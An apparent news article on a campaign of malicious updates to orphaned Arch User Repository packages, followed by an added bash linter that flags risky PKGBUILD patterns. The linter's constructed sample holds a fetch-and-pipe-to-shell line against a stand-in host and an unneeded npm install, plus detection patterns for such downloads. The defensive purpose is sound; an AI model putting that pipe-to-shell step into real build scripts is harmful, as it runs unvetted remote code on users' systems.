
AUR attack exposes trust flaws in Arch’s package hub


The Arch User Repository (AUR) faced a coordinated flood of malicious package updates this month. Attackers created fresh accounts, adopted orphaned PKGBUILD files and pushed code that installs malware during the build or install step. Maintainers scrambled for days, revoking compromised packages and disabling new-user registration to stop further hijacks. Unlike Copr, the AUR keeps every package's scripts in a single shared namespace, so a hijacked package reaches all of its users the moment the change is pushed.

With over 141,000 registered users and more than 107,000 packages, the AUR operates on a trust-based model: any account can click "Adopt Package" on an orphaned package and immediately gain write access. There is no formal review of PKGBUILD changes, even for "-bin" packages that download pre-built binaries, which leaves the ecosystem exposed to supply-chain abuse. Copr, by contrast, requires explicit ownership of a project namespace, which blocks this kind of easy hijack.

The latest campaign targeted hundreds of orphaned packages, inserting npm dependencies that exfiltrate credentials, cookies and chat logs. Earlier incidents in 2018 and 2023 affected only a few browser-related packages, but this wave shows how the AUR's open adoption process can be weaponized at scale. Arch maintainers now urge users to audit PKGBUILDs before building, and to verify checksums and source URLs every time.
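As an added example (not code from the article, Arch or the AUR), the bash script below performs the PKGBUILD checks the article calls for: unverified checksums, non-TLS source URLs, ad-hoc downloads or piped scripts in build steps, and npm dependencies inside a "-bin" package. Both sample PKGBUILDs and their example.invalid URLs are constructed for the demo.

```bash
#!/usr/bin/env bash
# Added example: a small linter for the PKGBUILD red flags the article names.
# Both sample PKGBUILDs are constructed for this demo, not real AUR packages.
write_suspicious_pkgbuild() {   # unverified source plus an npm payload in a -bin package
  cat > "$1" <<'EOF'
pkgname=demo-tool-bin
pkgver=1.0.0
pkgrel=2
source=("http://downloads.example.invalid/demo-tool-1.0.0.tar.gz")
sha256sums=('SKIP')
package() {
  npm install demo-telemetry
  curl -s https://cdn.example.invalid/setup.sh | sh
}
EOF
}
write_clean_pkgbuild() {        # TLS source with a pinned checksum, no network in package()
  cat > "$1" <<'EOF'
pkgname=demo-tool-bin
pkgver=1.0.0
pkgrel=1
source=("https://downloads.example.invalid/demo-tool-1.0.0.tar.gz")
sha256sums=('e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855')
package() {
  install -Dm755 demo-tool "$pkgdir/usr/bin/demo-tool"
}
EOF
}
# Print one line per red flag found in the PKGBUILD at $1 (exit status is always 0).
audit_pkgbuild() {
  local f="$1"
  # 'SKIP' tells makepkg not to verify that source at all.
  grep -q "'SKIP'" "$f" && echo "checksum SKIP: source integrity is not verified"
  # Plaintext transports let anyone on the path swap the tarball.
  grep -Eq '(http|ftp|git)://' "$f" && echo "non-TLS source URL"
  # Fetching outside source=() bypasses makepkg's checksum step entirely.
  grep -Ewq 'curl|wget' "$f" && echo "ad-hoc download in a build step"
  # Piping fetched content into a shell is remote code execution at build time.
  grep -Eq '\|[[:space:]]*(ba)?sh([[:space:]]|$)' "$f" && echo "remote script piped to shell"
  # A -bin package repackages a prebuilt binary; pulling npm deps is out of place.
  if grep -Eq '^pkgname=.*-bin' "$f" && grep -Eq 'npm +(i|install)( |$)' "$f"; then
    echo "npm install inside a -bin package"
  fi
  return 0
}
# Number of findings; awk always exits 0, so this is safe under set -e.
count_findings() { audit_pkgbuild "$1" | awk 'END { print NR }'; }
main() { f=$(mktemp); write_suspicious_pkgbuild "$f"; audit_pkgbuild "$f"; rm -f "$f"; }
main
```

Run it against a real PKGBUILD with `audit_pkgbuild /path/to/PKGBUILD`; every finding is a reason to read the file by hand before `makepkg`.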